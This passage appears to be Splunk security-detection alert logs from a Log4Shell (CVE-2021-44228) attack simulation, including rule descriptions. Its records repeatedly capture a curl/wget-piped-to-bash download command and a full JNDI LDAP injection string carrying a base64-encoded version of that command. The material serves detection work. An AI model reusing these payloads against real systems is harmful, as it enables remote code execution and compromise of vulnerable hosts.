remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645454, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645454, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense 